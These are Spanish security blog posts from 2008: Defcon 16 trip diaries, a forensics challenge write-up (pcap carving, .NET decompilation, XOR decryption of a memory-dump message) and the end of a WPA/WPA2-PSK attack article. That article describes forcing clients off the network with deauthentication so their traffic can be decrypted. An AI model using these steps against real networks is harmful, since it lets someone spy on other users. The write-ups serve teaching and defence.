Tengo muchas cosas encoladas tras el regreso de Defcon, entre ellas, muchos me habéis dejado el paper y la noticia de "Bypassing Browser Memory Protections in Windows Vista".

La interpretación de este artículo por parte de muchos de nuestros querios técnicoless ha sido increible y catastrofista. A mi me ha dado por bajarme el paper y la verdad, es que es muy interesante los casos que prueba. Como no he tenido tiempo de leermelo entero no voy a escribir ningún post incendiario por el momento llamando de todo a los "expertos en seguridad informática" que pululan por muchos blogs de este Internet nuestro. De momento os dejo solo las palabras de uno de los firmantes del paper que ha puesto en su twitter:

Lesson learned for next year: if you don't pre-brief reporters, they'll try to understand your research on their own, leading to epic FAIL!

Para los técnicos, aquí podéis bajaros el paper y leerlo, tiene partes chulas y muy bien explicadas "las situaciones" dónde se pueden saltar las protecciones.

En cuanto me lea y analice bien el paper os contaré algo más, que a mí me cuesta sacar conclusiones tan rápidas de un documento de 53 páginas con mogollón de datos técnicos, pero hay otros que son "eyaculadores precoces" cuando se juntan las palabras "Bug" y "Vista".

Saludos Malignos!

Defcon16 (III de III)

"Cotizado" Badge de Speaker
Las presentaciones de la Defcon

Acceder a las presentaciones de la Defcon es tan fácil como registrarse, pero, si quieres el video, tienes que pagar unos 2 de los grandes aproximadamente. Sí, un poco caro, pero es más barato que coger un avión para 5 personas y asistir a todas las charlas en paralelo. Aun así, me parece una pasta, y ya veré como lo consigo. Mientras tanto, alguien ha colgado las diapositivas de todas las presentaciones en esta URL:

Presentaciones Defcon16

Yo os recomiendo que os bajéis todas ASAP y luego busquéis la charla que queréis mirando el programa. En otro post os publicaré el whitepaper y las diapos finales de nuestra sesión y os sugeriré alguna charla en particular, que hay algunas muy buenas.

Es curioso ver el impacto de algunas charlas, como la que iban a dar los tres estudiantes del MIT sobre los fallos en los sistemas de tickets de la Massachusetts Bay Transit, que tuvo que ser cancelada por la orden de un juez.

En fin, un evento de lo más curioso. El año que viene intentaré estar allí …como sea.

Saludos Malignos!

*************************************************************************************************
- Defcon 16 (I de III)
- Defcon 16 (II de III)
- Defcon 16 (III de III)
*************************************************************************************************

martes, agosto 12, 2008

Solucionario Reto Hacking VIII (II de II)
por Dani Kachakil

***************************************************************************************
Solucionario Reto Hacking VIII (I de II)
Solucionario Reto Hacking VIII (II de II)
***************************************************************************************

Fase 2: Análisis forense de un disco duro

Tras introducir la clave de la fase anterior, accedemos a la segunda y última fase del reto, en la que se nos piden cuatro datos para superarlo (sujeto, sitio, día y hora) y también se nos indica los pasos a seguir para descargarnos un fichero RAR (de más de 400 MB, por cierto). Dicho fichero comprimido contiene un único fichero llamado XPForensics Hard Disk.vhd y por la extensión del mismo podemos deducir que se trata de una imagen o disco duro virtual en formato Virtual Hard Disk.

Se trata de un formato patentado por Microsoft, usado principalmente por las herramientas Virtual PC y Virtual Server, aunque la especificación del formato VHD es pública y parece bastante simple, por lo que hay varias herramientas que la soportan. Si disponemos de cualquiera de estas herramientas, podemos intentar arrancar la máquina virtual instalada, pero en principio no lograremos acceso al sistema operativo, ya que los usuarios del mismo están protegidos por contraseña.

De todas formas, tampoco es necesario arrancar el sistema operativo, ya que para tener acceso a su estructura de ficheros bastará con incluir la imagen como disco duro secundario de cualquier otro sistema operativo. Para ello podremos utilizar por ejemplo el propio Virtual PC sobre otra máquina virtual que tengamos instalada, o bien podemos montar la unidad en nuestro propio sistema operativo si nos instalamos el Virtual Server 2005 R2 SP1 (no nos valdrían versiones anteriores) y seguimos las indicaciones que aparecen en este post de David Cervigón.

Como aún no sabemos lo que buscamos, podemos empezar explorando un poco todos los directorios típicos en busca de algún fichero que nos dé alguna pista. Por ejemplo, el escritorio, la carpeta Mis documentos, directorios temporales, ficheros típicos como los DBX de Outlook Express, etc. Pero no solo es que no encontremos ningún fichero útil, sino que comprobamos que todas esas carpetas están vacías y eso resulta un tanto sospechoso en un disco principal de un sistema operativo que no está recién instalado.

Por tanto, nunca está de más intentar recuperar en la medida de lo posible los ficheros borrados con una utilidad como Restoration (vale, no es que sea la mejor del mercado, pero es gratuita y no está mal para lo poco que necesitamos en este momento). Vemos que consigue recuperar bastantes ficheros, entre los que destacan bastantes que son relativamente recientes y cuya ubicación original era precisamente la carpeta de archivos temporales de Internet del usuario administrador.

Fig. 5 – Restaurando archivos eliminados con Restoration
De momento localizamos al menos uno de ellos que parece contener alguna pista interesante. Se trata del fichero InboxLight[1].htm, que contiene una vista de la bandeja de entrada del correo electrónico del usuario, en la que podemos ver que hay un mensaje de correo enviado por Juan Garrido con el asunto "Mensaje importante". Sin embargo, en el resto de ficheros recuperados no encontramos el contenido de dicho mensaje, pero sí que hay un ejecutable eliminado que llama la atención. Se trata de la utilidad NotMyFault.exe de Sysinternals, utilizada para forzar volcados de memoria al provocar fallos intencionados y controlados a través de su driver.

Llegados a este punto, conviene recordar la existencia de los vídeos y de las presentaciones del evento Asegur@IT II, para los que no pudimos asistir. El vídeo de la sesión de Juan Garrido está cortado, pero entre el vídeo parcial y la presentación completa tenemos más que suficiente como para saber por dónde debemos continuar.

Encontramos en el disco virtual varios volcados de memoria dentro del directorio de Windows, pero destaca el MEMORY.DMP, que es un volcado completo (en el directorio Minidump hay otros dos que no nos servirán). Opcionalmente, podemos pasarle la utilidad strings de Sysinternals, que dejaría únicamente las cadenas de texto imprimible (ASCII y UNICODE), aunque su uso tampoco era necesario.

Si buscamos el contenido del texto "Mensaje importante" (por ejemplo, con un editor hexadecimal o con la utilidad de Windows findstr), localizaremos fácilmente un fragmento con el mensaje de correo electrónico, en el que se puede leer siguiente texto:

Ten mucho cuidado con este mensaje cifrado. No se lo dejes ver a nadie. Una vez lo hayas memorizado destruye todo archivo que relacione a este mail y al mensaje cifrado. Borra archivos temporales, cookies, ficheros del navegador y todo lo que se te ocurra para que no nos delate el equipo. La operación está en sus manos.
Saludos Sr. X

[Mensaje]Hjd+fAoAMTM2P2tUKi0qPC+Y+n47NBE3IDQ+LRs7O344M3s3P343FD...[/Mensaje]

Es evidente que la última parte del mensaje contiene un fragmento codificado en Base-64, pero no conseguimos leerlo decodificándolo, por lo que parece que además de estar codificado, también está cifrado. Si recordamos que la cadena que obtuvimos al terminar la fase 1 estaba etiquetada como "clave de cifrado", bastará con aplicar un algoritmo XOR con aquella cadena [[^^*********^^]] a los bytes resultantes de la decodificación del texto. El descifrado se aplica exactamente igual que el de cifrado y consiste en aplicar el siguiente algoritmo:

PARA i = 1 HASTA longitud_texto
cifrado(i) = texto(i) XOR clave(i MOD longitud_clave)

Aplicando este sencillo algoritmo al resultado de la decodificación del Base-64, obtendremos el siguiente texto en claro:

El "Macaco" estará esperandote en la puerta del "Pub ** *****" el día de la "Luna de ******" a la hora del "Te********".

Indistintamente, para nuestro objetivo también podíamos haber usado el fichero Pagefile.sys del directorio raíz, que curiosamente contenía un texto diferente en el cuerpo del correo electrónico, con otro mensaje en Base-64 también diferente:

Ten mucho cuidado con este mensaje cifrado. No se lo dejes ver a nadie. Una vez lo hayas memorizado destruye todo archivo que relacione a este mail. Y cuidado con los archivos temporales, no vaya a ser que nos hagan un forense!
Saludos Sr. X

Ag1SUDgRChUMKENSFwYECAas5kEXAQUVGxUBIw4GF1UVB1QDJkECBxACHR...

El texto resultó estar cifrado con una clave diferente (muy parecida, pero más corta y más simple). El texto descifrado resultó ser prácticamente el mismo (además del mostrado antes, tenía un salto de línea y el texto "Saludos Malignos!" al final). No obstante, a pesar de no haber tenido la contraseña o clave, este tipo de cifrado XOR se podría romper con mucha facilidad al estar aplicado sobre un texto plano de longitud considerable, aunque creo que eso lo dejaremos para otra ocasión si surge la oportunidad en un nuevo reto… ;-)

Por cierto, como es evidente, el reto termina al introducir literalmente los cuatro valores solicitados, que son los que aparecen entre comillas en nuestro texto descifrado.

Agradecimientos y comentarios

Como siempre, quiero terminar agradeciendo el trabajo de todos los que han hecho posible este reto, esta vez con mención especial a Juan Garrido (Silverhack), no solo por haber participado en el desarrollo del mismo, sino también porque gracias al vídeo y a las diapositivas de su charla, la segunda fase se me hizo mucho más sencilla.

No he incluido las diferentes contraseñas y claves que han ido apareciendo en las diferentes fases del reto, al igual que tampoco están los mensajes completos, porque considero que la única forma de asimilar este tipo de conocimientos es ponerse manos a la obra y practicar un poco, así que aprovecha que el reto está en línea (al menos de vez en cuando) y anímate a intentarlo.

Saludos, Daniel Kachakil.

***************************************************************************************
Solucionario Reto Hacking VIII (I de II)
Solucionario Reto Hacking VIII (II de II)
***************************************************************************************

lunes, agosto 11, 2008

Defcon16 (II de III)

A punto de Sobrepasar el punto de NO Retorno
A las 12 de la noche conseguí arrancar al abuelo de sus botellas de Johnny Walker etiqueta azul y Macallan de 18 años para dormir algo antes de dar la charla.

El abuelo "atrincherao"
A la mañana siguiente, estando en la speaker ready room me encontré con Luciano y Max. Lucho es un amor, lleno de alegría y energía con lo que la sensación fue de mucha ilusión. Además, Ben Feinstein estaba allí, hablándonos sobre que había creado un plug-in para snort que detectaba los ataques que había descrito Luciano, cuando apareció Luciano… je. Mola!.

Lucho, Ben y Maxz
Nuestra charla a las 10 fue bien, estuvimos tranquilos y realmente disfrutamos de estar allí. La gente se echó unas risas, aplaudió, participó y al final de la sesión nos vinieron a hacer varias preguntas. Una vez fuera, en la speaker room, se acercó una persona de la organización de una Con en Noruega para invitarnos a ir como ponentes…. Mmmm… Noruega….y claro, tras pensar en el …. Eh… clima… decidimos que sí, que había que ir, así que tal vez acabe en Noruega a principios del 2009.

He de decir, que en nuestra charla hubo bajas del comando español que se quedó ‘malita’ en cama, debido a que ellos no tuvieron la fuerza de un Jedi como yo para no pasar el punto de NO retorno en la fiesta y cayeron definitivamente en el lado oscuro. No diré nombres porque What happens in Las Vegas stays in Las Vegas.

El abuelo cantando en bermudas y chanclas
De ahí, he de reconocer que me fugué de compras, a comer, a celebrarlo y después a la supuesta fiesta de la Defcon, pero costaba 40 bucks de ‘donación’ y éramos los mismos de las charlas… así que… acabé con Luciano, Claudio, Ezequiel, Barroso, Diego, Angel, un argentino emigrado a Michigan a los 7 años y algún que otro asistente de la con que se pasaba, charlaba un rato, se tomaba unas birras y se piraba. Fue una noche tranquila para mí, pero de lo más agradable. Sin embargo, mi compañero de habitación, apareció a las 6 de la mañana….pobre… no debía haber hecho bien el cambio horario.

En una de las pasadas de peña pasaron los Pandas… pero de ellos ya os hablaré en otro post que se lo merecen más que nadie.

Al día siguiente asistí a varias charlas, a ver un par de ellas de WIFI, la de Cameron Hotchkies, a ver la CTF un rato y por supuesto la charla de Luciano y Max. A mitad de su charla empezó a sonar la alarma de incendio y la cosa quedó graciosa. La gente disfrutó con las demos, y yo les robé sus cámaras para tirarles muchas fotos, así que en su video de la charla, aparecerá un melenas robándole la cámara a un sorprendido Lucho que dice: ‘ein?’.

Las charlas, como siempre, hubo de todo, algunas de alto nivel, otras flojillas, algunas con buenos speakers y otras con buenas ideas pero con speakers no acostumbrados a audiencias grandes. Lógicamente, las estrellas de este año parecían ser tres: Luciano con el bug OpenSSL de Debian, la gente de SensePost con una charla preciosa que mezcla varias ideas para hacer una autentica virgería (está hay que desgranarla en otro post) y por supuesto Dan Kaminsky, que a pesar de todo, no hizo demo en la BH.

Tanto es así, que en la fiesta de IOActive que tuvo lugar el sábado por la noche, hicieron una foto a tamaño real en un cartón de Dam, para que te tiraras fotos con él. Nosotros no fuimos a esa fiesta porque reservamos en el hotel Palms para cenar en un italiano llamado Nové, que, curiosamente, estaba justo en el Club Playboy. ¡Qué casualidad más tonta! Así que, ya que estábamos, y sólo como actividad turístico-cultural decidimos que gastar 20 pavos no era tanto para entrar. Me encantaría contaros cosas de allí, pero el NDA no me lo permite y What happens in Las Vegas…

Después, ya entrada la madrugada regresé al hotel, a tomar la última y allí apareció la gente que quedaba de la fiesta de IOactive y entre ellos empedado o casi empedado el amigo Dan vestido con un mono naranja carcelario mientras disfrutaba de cachondeo… no sé como coño le salió la charla hoy… Bueno, mañana más, que este post ha sido escrito desde el aeropuerto camino de Toronto…

Saludos Malignos!

*************************************************************************************************
- Defcon 16 (I de III)
- Defcon 16 (II de III)
- Defcon 16 (III de III)
*************************************************************************************************

domingo, agosto 10, 2008

Defcon16 (I de III)

*************************************************************************************************
- Defcon 16 (I de III)
- Defcon 16 (II de III)
- Defcon 16 (III de III)
*************************************************************************************************

Es imposible comparar BlackHat EU 2008 con la Defcon16. Todo es distinto, el ambiente, la gente, todo. Hay que decir que, a pesar de que la organización es la misma el objetivo es radicalmente distinto, mientras en la BH EU 2008 me dijeron que ‘no me pasara con las cosas fuera de tono porque allí no encajaban’ aquí puede hacerse casi cualquier cosa.

La sensación desde mi punto de vista es particular y parcial, pero es la única que os puedo contar así que voy a tratar de transmitiros algunas cosas que hacen de este evento algo completamente distinto a la BH EU 2008.

En BH EU 2008 los asistentes tenían que pagar 1.000 eurazos para poder entrar a ver los dos días de track mientra que la entrada en la Defcon16 cuesta algo así como 120 dolares. La diferencia de coste es significativa y corta el perfil de los asistentes. Mientras que a la BH van sólo personas que han conseguido sacarle la pasta a las empresas, aquí en la Defcon viene peña de todo perfil. Así, en esta edición se hablaba de alcanzar las 6.000 personas.

Actividades

Sí, mientras en BH EU 2008 había como entre 300 o 400 personas merodeando por los tracks y los trainings, aquí hay peña para dar y tomar. Gente que se reparte entre los 4 tracks de sesiones que hay en el circuito de conferencias, el CTF dónde los Pandas with Gambas, al final de primer día de competición van segundos (que cra´s!), el concurso de de preguntas sobre TCP/IP [TCP/IP Drinking Game] dónde el pobre Dam Kaminski iba pillando cacho (¿alguien sabe en qué instituto estudió Tesla?) y si fallas una pregunta… bebes, las proyecciones de los documentales (Hackers, are people too?) o las reposiciones de ‘Juegos de Guerra’ o ‘Los Tres días del Condor’, el concurso del Guitar Heroes dónde todos los que tocan son máquinas, como si hubiera un generación de Conrads repartida por aquí, el concurso de hackear el badge, que os contaré más adelante, el Gringo Warrior, el Own the Box, o las fiestas de por la noche (nada recomendables si lo que buscas es un poco de baile, sexo y esas cosas… :P)

Así, no sólo con estas actividades se llenan estos tres días, sino que se añade la Toxic Barbaque para comer costillas y esas cosas tan light de por aquí con algunos de los ponentes y amigos de turno, el workshop de lockpicking o eventos fuera como el mobile hacker space o … son tantos, que podría estar escribiendo de todas las actividades que no he podido hacer. La agenda es muy apretada y hay mil cosas que hacer al mismo tiempo.

El Badge

Mientras que la estética en BH EU 2k8 se redujo al conocidísimo logo del hombre con el sombrero negro, aquí en la Defcon la mirada del indio era sólo el primero de los mil detalles estéticos que te encuentras por aquí. Nada más llegar te dan unas pegatas para decorar tu ropa o tu portátil, el badge es una placa electrónica completamente adaptada que diferencia las ‘clases sociales’ dentro del evento. Así, los pobres ‘Human’ se declaran asistentes al evento siendo la clase más baja. Los speakers llevamos un badge más clasista que nos diferencia de los demás. Así, mientras el nuestro es de color Verde con la palabra Speaker recortada en el lateral, el suyo es blanco con la palabra Human, pero no sólo hay estos, los organizadores llevan uno rojo con la palabra ¡GOON' o los participantes en otras actividades de otros colores. Todo este amor a la estética se ve reflejado en el merchandising y, aunque pueda parecer mentira, la tienda que vendía las camisetas de la Defcon, las gorras, etc… tuvo colas de más de 100 personas desde 3 horas antes de abrir el viernes hasta que cerró, agotadas todas las existencias el sábado al medio día. Sí, no me pude comprar ni una camiseta porque pensé que la gente ya se cansaría de comprar, pero no, no se cansó y se fundieron todas las camisetas. Increible.

En cuanto a las vestimentas de la gente, esto es un show constante, hay mucha gente con camisetas que mola ir leyendo continuamente. Frases como ‘Al leer este texto tu capacidad de leer ha subido en +1’ o ‘me siento vulnerable’ o ‘No sé qué haces para ser tan tonto, pero realmente funciona’ o los clásicos ‘root’, ‘pwoned’ o scripts de código en camisetas. Gorros, gabardinas y algún pasamontañas aparecen de cuando en cuanto entre algún que otro que va completamente disfrazo de ..algo.

El lugar

Es innegable que, aun siendo Amsterdam una de mis ciudades preferidas, la comparación con Las Vegas es siempre a perder. Amsterdam es una ciudad en la que llueve 200 días al año y suele hacer un frio de cojones en Marzo, mientras que en Las Vegas estás en el medio del desierto, rodeado de show, casinos, y fiestas por doquier. El ambiente incita a hacer el capullo sí o sí.

Saludos Malignos!
*************************************************************************************************
- Defcon 16 (I de III)
- Defcon 16 (II de III)
- Defcon 16 (III de III)
*************************************************************************************************

sábado, agosto 09, 2008

Solucionario Reto Hacking VIII (I de II)
por Dani Kachakil

***************************************************************************************
Solucionario Reto Hacking VIII (I de II)
Solucionario Reto Hacking VIII (II de II)
***************************************************************************************

Introducción

Este documento describe una solución al Reto Hacking VIII de Informática 64, el tercero de la segunda temporada, que se publicó el 4 de julio de 2008 en la siguiente dirección web: http://retohacking8.elladodelmal.com

Pistas

Supongo que el planteamiento del reto estaba bastante claro desde el principio, por lo que no se publicaron pistas previas al inicio del mismo.

Fase 1: Análisis forense de un fichero ".pcap"

Como viene siendo habitual en los últimos retos, para acceder a la primera fase teníamos que registrarnos con un nombre de usuario y una dirección de correo válida, donde recibiremos la contraseña correspondiente generada aleatoriamente. Una vez registrados y autentificados, accedemos a la fase 1.

En esta ocasión no teníamos que encontrar ningún tipo de vulnerabilidad, ya que por primera vez el reto no iba de eso, sino que tendremos que demostrar nuestras habilidades detectivescas en un reto de análisis forense. Todavía no tenemos muy claro nuestro objetivo, pero sí el primer paso, que era tan sencillo como descargarse un fichero comprimido que contenía otro llamado Trama.pcap

Por si alguien se enganchó en ese mismo punto, si no conocemos la extensión del fichero nunca está de más hacer una búsqueda previa:

- http://www.fileinfo.net/extension/pcap
- http://es.wikipedia.org/wiki/Pcap

Rápidamente vemos que se trata de un fichero que contiene capturas de paquetes de una red (obtenidas mediante un sniffer). Un excelente programa para abrir este tipo de fichero es el Wireshark (anteriormente conocido como Ethereal).

Una vez descargado e instalado, basta con abrir el fichero con este programa para visualizar toda la secuencia de paquetes que ha sido interceptada y almacenada. Vemos que hay todo tipo de secuencias de diferentes protocolos clásicos como DNS, NetBIOS, ARP, ICMP, HTTP, UDP, TCP, etc.

Llama la atención que desde el principio del fichero nos encontremos con tantos paquetes marcados como MSNMS, es decir, del protocolo de MSN Messenger. Si aplicamos un filtro para visualizar únicamente este protocolo (tecleando msnms en el cuadro de texto Filter de la ventana principal), tal vez podamos leer la conversación y enterarnos de alguna pista.

Fig. 1 – Visualizando el fichero en Wireshark con un filtro aplicado
Buscando más información sobre este protocolo, nos encontramos con que es propietario de Microsoft y no está publicado, por lo que todo lo que aparece en los siguientes enlaces, no es oficial y es fácil que no esté actualizado, que a veces no esté del todo completo o incluso que tal vez sea incorrecto:

- http://www.hypothetic.org/docs/msn/index.php
- http://msnpiki.msnfanatic.com/index.php

De momento no hace falta entender todo el protocolo que utiliza este programa, ya que si inspeccionamos a ojo el contenido de los paquetes podemos observar las direcciones de correo electrónico correspondientes a cada usuario y leer la conversación que aparece como texto plano en los paquetes MSG. Era la siguiente:

Es evidente que el texto de la conversación no da la solución a la fase, pero ya nos aporta una pista, puesto que habla de un envío de "algo". Si analizamos más a fondo el contenido de otros paquetes, observamos que el inmediatamente posterior al 846 (es decir, el 854, asumiendo que la vista sigue filtrada para visualizar solamente el protocolo MSNMS) contiene el siguiente texto codificado en Base-64, concretamente en el parámetro Context:

fgIAAAMAAAAi1gsAAAAAAAAAAABQAHQAbwBzAEQAZQBFAG4AYwB1AGUAbgB0AHIAbwAuAHAAbgBnAA...

Decodificando dicho texto comprobamos que la parte final corresponde con el texto claro PtosDeEncuentro.png, por lo que parece evidente que ese "algo" que se enviaba era un fichero PNG. Si nos entretenemos decodificando el resto de mensajes en Base-64 que se envían por el mismo protocolo, encontraremos un encabezado de PNG, e incluso podremos recomponer el fichero completo, pero eso solo es la miniatura que se envía incluso antes de aceptar y comenzar la recepción del fichero.

El fichero real se envía directamente del emisor al receptor (P2P), sin utilizar los servidores de MSN que actúan como intermediarios en las conversaciones normales. Por tanto, quitamos el filtro en el Wireshark y visualizamos de nuevo toda la trama de paquetes para darnos cuenta de que existe un tráfico bastante importante por TCP/IP entre las direcciones 192.168.1.105 y 192.168.1.107. Desde esta última IP se inicia el SYN en el paquete 985, recibe el ACK en el 986 y queda claro que a partir de ahí existe una secuencia o stream TCP que parece tener su interés para superar el reto.

Para recomponer la secuencia basta con pulsar con el botón derecho sobre cualquier paquete de la misma y seleccionar del menú contextual (o del menú Analyze) la opción Follow TCP Stream. Entonces nos aparecerá una ventana con toda la secuencia TCP/IP entre ambas direcciones. Sin embargo, tras echarle un vistazo general a toda la secuencia, determinamos que solo nos interesa el tráfico de un único sentido, ya que es el que contiene el fichero propiamente dicho. Por tanto, seleccionamos del cuadro de lista desplegable la opción que muestra solamente los paquetes enviados desde 192.168.1.107 hacia 192.168.1.105 y exportaremos el contenido a un fichero. Para ello es imprescindible seleccionar la opción adecuada (RAW), ya que de otra forma el fichero resultante no se corresponderá con la secuencia original.

Fig. 2 – Opción "Follow TCP Stream" en Wireshark
Una vez exportado el fichero, comprobamos que la cabecera del PNG aparece después de 112 bytes, pero incluso eliminando esa parte, el resultado no parece corresponder con un fichero PNG válido. Revisando la secuencia con un editor hexadecimal comprobamos que cada cierta distancia aparecen algunos bloques de datos sospechosos, ya que no parecen corresponder al fichero. Analizando este tipo de bloques llegamos a la conclusión inicial de que tienen una longitud de 52 bytes, que comienzan por "78 05 00 00" (hex) y aparecen a intervalos regulares de 1404 bytes, así que optamos por eliminarlas pero aún así no se visualiza el PNG. Más adelante veremos que esto no es del todo cierto…

Está claro que nos hemos dejado algo por el camino y es que con todo lo que hemos hecho, no era tan difícil toparse con un encabezado "PK" y con un Cliente.exe que aparecía por ahí muy cerca. La clave del fallo es que hemos asumido erróneamente de que se trataba del envío de un fichero PNG, cuando en realidad se trata de un envío simultáneo de dos ficheros, tal y como podemos comprobar si además del anterior (854) analizamos también el contenido del paquete 940 (de nuevo el Context que aparece en Base-64), ya que contiene el texto Cliente.zip y eso nos llevará a adoptar otra metodología de trabajo orientada a diferenciar y extraer los bloques de cada fichero por separado.

Ahora es cuando entran en juego esas cabeceras de 52 bytes que antes habíamos eliminado tan alegremente, ya que contienen información muy valiosa que no podemos ignorar (incluso en el caso de haberse transferido un único fichero, este método no habría funcionado). Si volcamos todos esos bytes y analizamos minuciosamente todas las cabeceras que comienzan por "78 05 00 00" y que habíamos asumido que tenían una longitud total de 1404 bytes, nos damos cuenta de que la mayoría de bytes son cero o son idénticos en todas ellas, pero otros varían, tal y como podemos apreciar en esta tabla cuyos valores están todos en decimal:

Por las cabeceras, sabemos que el primer paquete corresponde al fichero PNG y el segundo al ZIP, por lo que no resulta complicado concluir que los bytes 5, 9, 21 y 22 tienen una relación directa con el fichero. Puede que indiquen su tamaño total, o que sean parte de algún identificador, aunque tampoco nos importa demasiado para lograr nuestro objetivo, que no es otro que separar ambos ficheros. Sin embargo, si juntamos las partes correspondientes al ZIP, no conseguimos recomponer el fichero, ya que no se podrá descomprimir correctamente con ningún descompresor.

Por otro lado, en la tabla hemos calculado el tamaño del paquete restando el offset actual del siguiente, pero comprobamos que existe un salto inesperado que resalta otro error del planteamiento ya que aparentemente tenemos un paquete de tamaño 2451, cuando en realidad en ese bloque se esconden dos paquetes. No se trata de localizar la secuencia en hexadecimal "78 05 00 00", sino de leerla e interpretarla correctamente. Esos 4 bytes nos están indicando la longitud del resto del mensaje, en orden inverso (en nuestro caso, 0578 en hexadecimal, o lo que es lo mismo, 1400 bytes).

Por ello debemos corregir la información anterior e interpretar correctamente los paquetes correspondientes a ese bloque, ya que todo parece indicar que nos falta el último trozo del fichero ZIP.

Ahora que ya hemos conseguido separar ambos ficheros, descomprimimos el ZIP, extrayendo y ejecutando el fichero Cliente.exe (que requiere .NET Framework 2.0), comprobando que se trata de una sencilla aplicación que nos solicita una contraseña para obtener una supuesta clave de cifrado.

Para analizar su funcionamiento interno nada mejor que descompilarla usando alguna herramienta como .NET Reflector y localizar el código que se ejecuta al pulsar el botón btRecuperar del formulario principal (llamado Clave). Vemos que hay una instrucción IF que comprueba si la contraseña introducida tiene una longitud de 9 caracteres y además hay un bucle que verifica que dicha contraseña se corresponde con una almacenada en un vector de enteros incluido en el mismo método. Si la contraseña coincide, entonces se realiza una llamada a un servicio web.

Fig. 3 – Código descompilado usando .NET Reflector
El código es tan evidente que no vale la pena elegir un camino que no sea el de determinar la correspondencia directa de los caracteres de la contraseña en ASCII (es decir, chur*****) e introducirla en el programa en ejecución para que continúe ejecutando el resto del código, obteniendo así la palabra clave de cifrado necesaria para superar la fase 1, es decir, [[^^*********^^]]. Por cierto, el fichero PNG no tenía ninguna utilidad para superar el reto, pero por simple curiosidad, este era su contenido:

Fig. 4 – Fichero PtosDeEncuentro.png (reducido)
***************************************************************************************
Solucionario Reto Hacking VIII (I de II)
Solucionario Reto Hacking VIII (II de II)
***************************************************************************************

viernes, agosto 08, 2008

Hecho Berberecho!

Todo salió de puta madre, el abuelo y yo lo pasamos teta y tenemos un montón de fotos, mañana, después de la fiesta prometo poneros las fotos. Hubo como unas 600-800 personas y creo que se lo pasaron bien con nuestras tonterias.

Saludos Malignos!

Denial Of Service Attack

Sí, me atacaron anoche, toda una panda de cabronazos con copas gratis en la habitación 448 del Hard Rock Cafe Casino Hotel de Las Vegas. Salimos a tomar unas copas y nos juntamos como 15 hispanos entre telefónicos, s21sequeros de España y México, Spectristas de Redmon y España y algún que otro de por ahí.

Total, que lo que iba ser salir a "comer algo y tomar una cerveza" antes del día de la charla se convirtió en "Abuelo, cabronazo, ¡qué son las 12 de la noche, estamos con 4 copas y estoy a punto de pasar el punto de NO retorno".

Sí, el abuelo quería seguir allí con el Macallan 18 años y el Johnny Walker etiqueta azul gratuitos que pilló y no soltó en toda la noche mientras discutia a diestro y siniestro con argentinos, mexicanos, españoles y el que se pusiera por delante.

Son las 6 de la mañana en Las Vegas, nos estamos quitando la resaca un poco de encima, aclarando la voz y preparándonos para cantar. A las 10 de la mañana nos toca, ya os contaré como nos va.

De momento esto está lleno de peña y ha habido colas inmensas de gente para comprar merchandising de la Defcon. Sí, NO hay muchas mujeres por aquí (si no es pagando...), pero... ¿qué os esperabais?

Saludos Malignos!

No Lusers 51: Captcha

jueves, agosto 07, 2008

Estamos en Las Vegas

Hola a tod@s,

el abuelo y yo llegamos anoche (hora Las Vegas que son 9 horas menos que en España). El viaje fue de 19 horas con parada en Toronto, así que llegamos hechos fosfatina. Nos metimos en la cama y hemos hecho el cambio horario, así que esperamos estar listos para la fiesta.

A todos los que me habéis contactado para quedar en Las Vegas, mañana a las 10 de la mañana tenemos nuestra charla. Allí, nos vemos, quedamos, intercambiamos teléfonos y organizamos los planes.

Hoy vamos a estar en el hotel Riviera, preparando la charla, bañandonos en la piscina y registrándonos como speakers de 2 a 5. Esta noche habrá cenita y birras, pero de tranqui, nada de salvajismos hasta que hayamos cantado!!

Saludos Malignos!

Atacar WPA/WPA2 PSK (parte IV de IV)

Imagen 14: Clave de cifrado WPA
A pesar de tener configurada la clave PSK de la red aún no sería posible descifrar el tráfico de red de un usuario que estuviera previamente. Para descubrir las claves que están siendo utilizadas por cada uno de los clientes es necesario lanzar un ataque 0 de des-asociación. Esto obligaría a los clientes a re-asociarse y ahora, al contar con la clave PSK de la red, Commview obtendrá la clave PMK e inmediatamente las claves de cifrado que están siendo usadas por cada cliente en concreto. Esto permitirá ver todo el tráfico de la red descifrado.

Imagen 15: Paquetes WPA2 capturados y descifrados
Recomponiendo la sesión
Al igual que con otros sniffers de red, es posible reconstruir la sesión TCP completa y ver la comunicación que se está produciendo en cada cliente. En este caso, la página Web que estaba visitando el usuario en El Lado del Mal.

Imagen 16: Sesión TCP/IP reconstruida
Conclusión

El uso de WPA/WPA2-PSK es una solución adecuada de seguridad en un entorno doméstico siempre y cuando se utilice una clave segura. Como se ha visto a lo largo del artículo la seguridad no depende de la cantidad de tráfico que circule por la red, sino de la posibilidad de obtener la clave de cifrado a partir de los paquetes donde se produce la autenticación del usuario. Basta con una pequeña cantidad de paquetes para poder obtener los paquetes derivados de la clave. Por lo tanto, es necesario utilizar frases o claves fuertes. Para determinar la fortaleza de una clave se puede recurrir a páginas como Passwordmeter, o a cualquiera de los generadores de claves WPA/WPA2 que proporcionan claves fuertes, como, por ejemplo el de http://www.kurtm.net/wpa-pskgen/.

Para evitar que el craqueo de la clave PSK sea trivial para un atacante hay que evitar claves que se encuentren en diccionarios, claves de poca longitud de caracteres y de poca complejidad. Así mismo, para evitar que puedan utilizar tablas pre-calculadas hay que evitar los nombres SSID simples o comunes, del tipo “Home”, “Personal”, "Wifi", “Default”, “Wireless”, “Net”, etc…

A pesar de todo, el tener una red WPA/WPA2 PSK más o menos segura contra atacantes externos mediante el uso de claves difíciles de crackear, esta infraestructura no ofrece ninguna protección contra atacantes internos. Este artículo deja claro que cualquier usuario legítimo de la red podrá acceder a todos los datos de todos los demás usuarios como se ha visto en la última parte.

Soluciones

Para evitar que las comunicaciones pudieran ser espiadas por parejas, familiares o vecinos existen soluciones WPA/WPA2 empresariales con el uso de servidores RADIUS y sistemas de autenticación EAP basados en certificados digitales, contraseñas e incluso el uso de cifrado SSL para el intercambio EAP [Protected EAP]. Así podríamos implantar una infraestructura WPA/WPA2-EAP-MSCHAPv2, WPA/WPA2-EAP-MD5, WPA/WPA2-EAP-TLS (con autenticación del cliente mediante certificados digitales de usuario) y los más fortalecidos WPA/WPA2-PEAP-MSCHAPv2, también conocido como TLS-EAP-TLS por ser este el orden de las capas de los protocolos, dónde primero se autentica realiza una conexión SSL entre el servidor y el cliente con certificado de máquina del servidor o del servidor y el cliente, con lo que se autentica digitalmente la máquina cliente primero, luego se negocia con EAP la autenticación mediante el uso de certificados digitales de usuario y por último el usuario envía su certificado sobre la capa SSL inicial.

Para realizar una implantación segura aquí tienes algunos recursos:

- [PCWorld] Proteger una red wireless I
- [PCWorld] Proteger una red wireless II
- [PCWorld] Proteger una red wireless III
